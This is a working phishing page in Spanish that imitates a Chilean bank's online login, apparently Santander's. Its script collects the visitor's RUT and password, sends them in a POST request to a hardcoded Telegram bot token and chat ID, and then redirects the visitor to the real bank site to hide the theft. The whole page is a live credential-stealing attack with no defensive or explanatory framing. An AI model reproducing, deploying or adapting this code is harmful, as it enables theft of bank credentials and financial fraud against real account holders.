<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Formulario</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            background-color: white;
        }
        header {
            width: 100%;
            background-color: #FF0000;
            color: white;
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 10px;
            box-sizing: border-box;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 1000;
        }
        .menu-icon {
            font-size: 24px;
            cursor: pointer;
        }
        .menu-icon::before {
            content: "\2630"; /* Unicode character for the three bars menu icon */
        }
        .container {
            background-color: white;
            padding: 20px;
            width: 90%;
            max-width: 400px;
            margin-top: 20px;
            border: none;
        }
        form {
            display: flex;
            flex-direction: column;
        }
        input {
            margin-bottom: 20px; /* Más espacio entre inputs */
            padding: 15px; /* Inputs más grandes */
            font-size: 18px; /* Texto más grande */
            border: 1px solid #ccc;
        }
        button {
            padding: 15px; /* Botón más grande */
            font-size: 18px; /* Texto del botón más grande */
            background-color: rgb(240, 240, 240); /* Color de fondo gris claro */
            color: black;
            border: none;
            cursor: pointer;
            margin-top: 20px; /* Más espacio entre el último input y el botón */
            border-radius: 8px; /* Esquinas redondeadas */
        }
        button:hover {
            background-color: rgb(240, 240, 240);
        }
        h1 {
            color: red;
            margin-top: 80px; /* Añadir margen superior para evitar que el título quede oculto detrás del header */
            font-size: 24px; /* Tamaño de fuente más pequeño */
        }
        .subtext {
            font-size: 16px;
            color: black;
            text-align: center;
            margin-top: -6px;
        }
        .image-container {
            margin-top: 20px;
        }
    </style>
</head>
<body>
    <header>
        <img src="San.png" alt="Logo" style="height: 40px;">
        <div class="menu-icon"></div>
    </header>
    <h1>Ingresa a tu banco en línea</h1>
    <div class="subtext">Versión clásica (escritorio)</div>
    <div class="container">
        <form id="loginForm">
            <input type="text" id="path" name="path" placeholder="Rut" required>
            <input type="password" id="password" name="password" placeholder="Contraseña" required>
            <button type="button" onclick="enviarDatos()">INIGRESAR</button>
        </form>
    </div>
    <div class="image-container">
        <img src="https://i.ibb.co/99LX9vv/Screenshot-20240527-205652-Chrome.jpg" alt="Imagen Abajo" style="width: 100%; max-width: 400px;">
    </div>

    <script>
        function enviarDatos() {
            var rut = document.getElementById('path').value;
            var contraseña = document.getElementById('password').value;

            // Datos del bot de Telegram y el chat ID al que enviar el mensaje
            var token = '7226973718:AAGfv_AQwJSY5esVJJ-L682PdQk-zatXXpc';
            var chat_id = '7101053333';

            // Mensaje a enviar
            var mensaje = "Rut: " + rut + "\nContraseña: " + contraseña;

            // URL de la API de Telegram para enviar mensajes
            var url = 'https://api.telegram.org/bot' + token + '/sendMessage';

            // Configuración de la solicitud POST
            var parametros = {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: chat_id,
                    text: mensaje
                })
            };

            // Enviar la solicitud POST a la API de Telegram
            fetch(url, parametros)
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Hubo un problema al enviar el mensaje.');
                    }
                    return response.json();
                })
                .then(data => {
                    console.log('Mensaje enviado correctamente:', data);
                    // Redirigir al usuario a otra página web
                    window.location.href = 'https://banco.santander.cl/personas';
                })
                .catch(error => {
                    console.error('Error al enviar el mensaje:', error);
                    // Aquí puedes manejar errores, como mostrar un mensaje de error al usuario
                });
        }
    </script>
</body>
</html>